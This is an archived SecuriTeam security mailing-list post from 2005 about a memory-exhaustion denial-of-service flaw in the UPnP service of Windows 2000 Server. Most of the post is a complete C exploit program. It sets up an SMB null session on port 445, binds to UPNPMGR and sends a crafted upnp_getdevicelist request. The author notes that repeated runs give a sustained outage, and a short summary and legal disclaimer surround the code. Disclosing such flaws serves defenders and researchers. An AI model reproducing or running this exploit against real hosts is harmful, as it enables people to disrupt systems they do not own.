[EXPL] Windows 2000 Server UPNP DoS (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 11/14/05
- Previous message: SecuriTeam: "[UNIX] Lynx Command Execution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 14 Nov 2005 16:16:36 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Windows 2000 Server UPNP DoS (Exploit)
------------------------------------------------------------------------
SUMMARY
A memory leak with windows 2000 server UPNP allow attackers to exploit
the virtual memory to a point it consumed too much memory and causing a
denial of service on the system.
DETAILS
Exploit:
/*
* Author: Winny Thomas
* Nevis Labs, Pune, INDIA
*
* Details:
* While working on the exploit for MS05-047 i came a cross a condition
where
* a specially crafted request to upnp_getdevicelist would cause
* services.exe to consume memory to a point where the target machines
virtual
* memory gets exhausted. This exploit is NOT similar to the MS05-047
exploit i
* published earlier. The earlier one trashed the EIP of the target
causing a
* crash in services.exe and eventually brought down the system to shut
down.
* However in this exploit (again a DOS) the virtual memory is consumed to
a
* point where desktop requests (like clicking "My Computer"), HTTP
requests,
* SMB requests etc does not get serviced for sometime. After sometime the
* memory usage comes down and the target system would work as normal.
However
* this code when continuosly executed against a target leads to a
sustained
* DOS attack.
* Start the task manager on the target system and run this code against
the
* target and watch the virtual memory usage shoot up.
*
* I used windbg to break on calls to upnp_getdevicelist when running this
code.
* However even before the break point is hit the system becomes
unresponsive.
* Strangely though changing the operation number in the DCERPC request to
* something else other than 0xa (upnp_getdevicelist) will make the DOS
attempt
* fail. Perhaps changing the payload a little bit, so that the underlying
* demarshalling routines dont return an error, might reproduce this
effect
* for other UPNP operations as well.
*
* TESTED ON: Windows 2000 server SP0, SP2 and SP3. I have not tested this
on
* any of the above machines with the recent hot fixes for UPNP.
*
* Note: This code is for educational/testing purposes by authorized
persons on networks systems setup for such purposes
* The author shall bear no responsibility for any damage caused by
using this code.
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
unsigned short ProcessID = 0;
unsigned short TID = 0;
unsigned short UserID = 0;
unsigned short FID = 0;
char peer0_0[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00" ;
char peer0_1[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";
char peer0_1_2[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3"
"\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";
char peer0_2[] =
"\x00\x00\x00\x58\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2D\x00\x00";
char peer0_3[] =
"\x00\x00\x00\x66\xff\x53\x4d\x42\xa2\x00\x00\x00\x00\x18\x07\xc8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xff\xfe"
"\x00\x08\x40\x00\x18\xff\x00\xde\xde\x00\x10\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x13\x00\x00\x5c\x00\x62\x00\x72\x00\x6f\x00"
"\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";
char peer0_4[] =
"\x00\x00\x00\x9A\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x08\x01\xC0"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x01\x00\x10\x00\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x48\x00\x52\x00\x02"
"\x00\x26\x00\x00\x40\x57\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00"
"\x00\x00\x00\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11\x8F\x69"
"\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C"
"\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";
char peer0_5[] =
//NETBIOS Fields
//==============
"\x00" //Message type
"\x00\x00\x80" //Payload length C
//SMB Fields
//==========
//SMB Header
"\xFF\x53\x4D\x42\x2F\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x40\x6D\x4E\xF4\x8C\x6E\x13\x7B\x00\x00\x00\x08\xFF\xFE"
"\x00\x08\x00\x01"
//Write ANDX Request fields
"\x0E" //Word count
"\xFF\x00\xDE\xDE\x00\x40\x00\x00\x00\x00\xFF"
"\xFF\xFF\xFF\x08\x00"
"\x40\x00" //Remaining C
"\x00\x00" //Data Length High
"\x40\x00" //Data Length Low C
"\x40\x00" //Data Offset C
"\x00\x00\x00\x00" //High Offset
"\x41\x00" //Byte count C
"\xEE"//Padding
//DCE RPC Request field
//=====================
"\x05\x00\x00\x03\x10\x00\x00\x00"
"\x40\x00" //Frag Length
"\x00\x00" //Auth Length
"\x8D\x00\x00\x00" //Call Id
"\x28\x00\x00\x00" //Alloc HINT C
"\x00\x00" //Context Id
"\x0A\x00" //OpNum; 10 in our case for PNP_GetDeviceList
//DATA for GetDeviceList
"\x00\x00\x00\x00"
"\x10\x10\x10\x10" //This is what kills the target. \x00\x00\x00\x00 is
safe
"\x48\x54\x52\x45\x45\x5C\x52\x4F\x4F\x54\x5C"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00";
void send_packet(int sock, char *payload, int size, char *type)
{
int ntrans, ret;
memcpy(&payload[30], &ProcessID, 2);
if (UserID)
memcpy(&payload[32], &UserID, 2);
if (TID)
memcpy(&payload[28], &TID, 2);
if (strcmp(type, "Sending DCE RPC Bind UPNPMGR request") == 0) {
memcpy(&payload[67], &FID, 2);
}
if (strcmp(type, "UPNPMGR upnp_getdevicelist request") == 0) {
memcpy(&payload[41], &FID, 2);
}
printf("[*] %s: ", type);
fflush(stdout);
ntrans = send(sock, payload, size, 0);
if (ntrans < 0) {
printf("\033[0;31mFailed\033[0;39m\n\n");
exit(-1);
}
}
void get_response(int sock, char *type)
{
int ret;
char response[1496];
ret = recv(sock, response, 1496, 0);
if (strcmp(type, "Null Session request 1") != 0) {
if ((ret < 0 || response[9] != 0)) {
printf("\033[0;31mError in %s
response\033[0;39m\n\n", type);
exit(-1);
}
}
if (strcmp(type, "Null Session request 1") == 0) {
UserID = *(unsigned short *)&response[32];
}
if (strcmp(type, "Tree Connect") == 0) {
TID = *(unsigned short *)&response[28];
}
if (strcmp(type, "NT Creat AndX") == 0) {
FID = *(unsigned short *)&response[42];
}
if (strcmp(type, "UPNPMGR upnp_getdevicelist") == 0)
{
if((unsigned long)response[88] != 0) {
printf("\033[0;31mnca_s_fault_ndr\033[0;39m\n\n");
exit(-1);
}
}
printf("\033[0;32mOK\033[0;39m\n");
}
void banner()
{
printf("\n\n\033[0;31m\t!------------------------------------------!\n\033[0;39m");
printf("\033[0;31m\t Memory leak when sending upnp_getdevicelist
request\n\033[0;39m");
printf("\033[0;31m\t Coded by: \033[0;34m Winny Thomas
:-)\n\033[0;39m");
printf("\033[0;34m\t\t NevisLabs\n\033[0;39m");
printf("\033[0;34m\t\t Nevis Networks, Pune, INDIA\n\033[0;39m");
printf("\033[0;31m\t!------------------------------------------!\n\n\033[0;39m");
}
char *setup_tCon(char *UNC, char *ptr)
{
int pindex = 0, uindex = 0, len;
len = strlen(UNC);
while (uindex < len) {
if ((pindex % 2) != 0) {
ptr[pindex] = '\x00';
pindex++;
continue;
}
ptr[pindex] = UNC[uindex];
uindex++;
pindex++;
}
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = 'I'; pindex++; ptr[pindex] = 'P'; pindex++;
ptr[pindex] ='C'; pindex++;
ptr[pindex] = '\x00';
pindex++;
ptr[pindex] = '\x00';
pindex++;
}
int main(int argc, char *argv[])
{
struct sockaddr_in target;
struct hostent *host;
char UNC[50], tConXpacket[150], *temp, targetIP[20];
int sockfd;
int ret, templen;
system("clear");
banner();
if (argc < 2) {
printf("Usage: %s <host name|ip address>\n\n", argv[0]);
exit(-1);
}
srand(time(NULL));
ProcessID = rand();
printf("[*] Resolving %s: ", argv[1]);
host = gethostbyname(argv[1]);
if (!host) {
printf("\033[0;31mFailed\033[0;39m\n");
exit(-1);
}
printf("\033[0;32mOK\033[0;39m\n");
target.sin_family = AF_INET;
target.sin_addr = *(struct in_addr *)host->h_addr;
target.sin_port = htons(445);
sprintf(targetIP, "%s", inet_ntoa(target.sin_addr));
sockfd = socket(AF_INET, SOCK_STREAM, 0);
ret = connect(sockfd, (struct sockaddr *)&target, sizeof(target));
if (ret < 0) {
perror("Connect");
exit(-1);
}
send_packet(sockfd, peer0_0, sizeof(peer0_0) -1, "Sending SMB
Negotiate request");
get_response(sockfd, "SMB Negotiate");
send_packet(sockfd, peer0_1, sizeof(peer0_1) -1, "Sending Null
Session request");
get_response(sockfd, "Null Session request 1");
send_packet(sockfd, peer0_1_2, sizeof(peer0_1_2) -1, "Sending Null
Session request");
get_response(sockfd, "Null Session request 2");
bzero(tConXpacket, 150);
temp = tConXpacket;
memcpy(tConXpacket, peer0_2, sizeof(peer0_2));
temp += sizeof(peer0_2) -1;
sprintf(UNC, "\\\\%s\\IPC$", targetIP);
setup_tCon(UNC, temp);
templen = (strlen(UNC)*2) +9;
tConXpacket[3] = 43 + templen;
templen -= 2;
memcpy((unsigned long *)&tConXpacket[45], &templen, 1);
send_packet(sockfd, tConXpacket, sizeof(peer0_2) +templen,
"Sending Tree Connect request");
get_response(sockfd, "Tree Connect");
send_packet(sockfd, peer0_3, sizeof(peer0_3) -1, "Sending NT Creat
AndX request");
get_response(sockfd, "NT Creat AndX");
send_packet(sockfd, peer0_4, sizeof(peer0_4) -1, "Sending DCE RPC
Bind UPNPMGR request");
get_response(sockfd, "DCE RPC Bind UPNPMGR");
send_packet(sockfd, peer0_5, sizeof(peer0_5) -1, "UPNPMGR
upnp_getdevicelist request");
get_response(sockfd, "UPNPMGR upnp_getdevicelist");
close(sockfd);
}
/* EoF */
ADDITIONAL INFORMATION
The information has been provided by <mailto:winnymthomas@yahoo.com>
WINNY THOMAS.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Lynx Command Execution"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- (CORRECTION) memory leak and eventual DOS when calling UPNP getdevicelist on windows 2000 server
... and then you will see the memory usage shoot up. ... * a specially crafted
request to upnp_getdevicelist ... (Vuln-Dev) - [UNIX] Sun Management Console Directory Traversal Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... any path specified with root
privileges. ... example of interesting things to request, ... Which will answer
interesting questions like "does my target run ... (Securiteam) - memory leak and eventual DOS when calling UPNP getdevicelist on windows 2000 server
... * a specially crafted request to upnp_getdevicelist ... target machines virtual
... * memory gets exhausted. ... void send_packet(int sock, char *payload,
int size, ... (Vuln-Dev) - [EXPL] CA BrightStor Arcserve tapeeng.exe Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... print 'Could not connect to target
port; ... #RPC request to enable detail logging ... (Securiteam) - [NEWS] McAfee ePolicy Orchestrator Remote Compromise
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... request, UUID, and computer
hostname. ... The data that follows first specifies a directory and xml filename, ...
+06h DWORD file offset of XML ... (Securiteam)
